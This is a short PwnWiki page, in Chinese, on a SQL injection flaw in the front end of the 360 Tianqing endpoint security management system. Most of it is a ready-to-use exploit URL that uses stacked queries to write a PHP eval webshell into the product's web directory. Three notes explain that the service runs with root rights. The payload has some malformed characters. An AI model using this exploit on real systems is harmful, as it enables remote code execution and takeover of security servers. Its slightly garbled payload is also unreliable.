終端安全管理系統(天擎)前端SQL注入漏洞

From PwnWiki
Other languages:
Chinese • ‎中文(繁體)‎

EXP

https://127.0.0.1:8843/api/dp/rptsvcsyncpoint?ccid=1';create table O(TEXT);insert into O(T) values('<>php @eval($_POST[1];?>)');copy O(T) to 'C"\Program Files(x86)\360\skylar6\www\1.php';drop table O;--

漏洞信息

1.通過安裝包安裝的程序一般擁有ROOT權限,因此該注入點可嘗試寫入Shell

2.通過注入點,創建一張表 O

3.爲表O添加一個新字段T並且寫入Shell內容

Retrieved from "https://pwnwiki.com/index.php?title=終端安全管理系統(天擎)前端SQL注入漏洞&oldid=1205"